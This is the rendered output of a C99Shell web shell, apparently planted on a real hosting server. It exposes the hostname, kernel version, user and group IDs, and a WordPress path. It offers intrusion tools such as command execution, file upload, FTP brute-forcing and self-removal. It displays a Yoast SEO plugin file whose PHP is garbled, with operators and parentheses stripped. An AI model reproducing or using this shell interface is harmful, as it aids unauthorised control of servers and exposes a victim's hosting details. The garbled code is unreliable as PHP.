!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/wordpress-seo/admin/   drwxr-xr-x
Free 180.03 GB of 490.84 GB (36.68%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     class-option-tabs.php (2.04 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package WPSEO\Admin\Options\Tabs
 */

/**
 * Class WPSEO_Option_Tabs
 */
class WPSEO_Option_Tabs {

    
/** @var string Tabs base */
    
private $base;

    
/** @var array The tabs in this group */
    
private $tabs = array();

    
/** @var string Name of the active tab */
    
private $active_tab '';

    
/**
     * WPSEO_Option_Tabs constructor.
     *
     * @param string $base       Base of the tabs.
     * @param string $active_tab Currently active tab.
     */
    
public function __construct$base$active_tab '' ) {
        
$this->base sanitize_title$base );

        
$tab              filter_inputINPUT_GET'tab' );
        
$this->active_tab = empty( $tab ) ? $active_tab $tab;
    }

    
/**
     * Get the base
     *
     * @return string
     */
    
public function get_base() {
        return 
$this->base;
    }

    
/**
     * Add a tab
     *
     * @param WPSEO_Option_Tab $tab Tab to add.
     *
     * @return $this
     */
    
public function add_tabWPSEO_Option_Tab $tab ) {
        
$this->tabs[] = $tab;

        return 
$this;
    }

    
/**
     * Get active tab
     *
     * @return null|WPSEO_Option_Tab Get the active tab.
     */
    
public function get_active_tab() {
        if ( empty( 
$this->active_tab ) ) {
            return 
null;
        }

        
$active_tabs array_filter$this->tabs, array( $this'is_active_tab' ) );
        if ( ! empty( 
$active_tabs ) ) {
            
$active_tabs array_values$active_tabs );
            if ( 
count$active_tabs ) === ) {
                return 
$active_tabs[0];
            }
        }

        return 
null;
    }

    
/**
     * Is the tab the active tab
     *
     * @param WPSEO_Option_Tab $tab Tab to check for active tab.
     *
     * @return bool
     */
    
public function is_active_tabWPSEO_Option_Tab $tab ) {
        return ( 
$tab->get_name() === $this->active_tab );
    }

    
/**
     * Get all tabs
     *
     * @return WPSEO_Option_Tab[]
     */
    
public function get_tabs() {
        return 
$this->tabs;
    }

    
/**
     * Display the tabs
     *
     * @param Yoast_Form $yform   Yoast Form needed in the views.
     * @param array      $options Options needed in the views.
     */
    
public function displayYoast_Form $yform$options = array() ) {
        
$formatter = new WPSEO_Option_Tabs_Formatter();
        
$formatter->run$this$yform$options );
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0259 ]--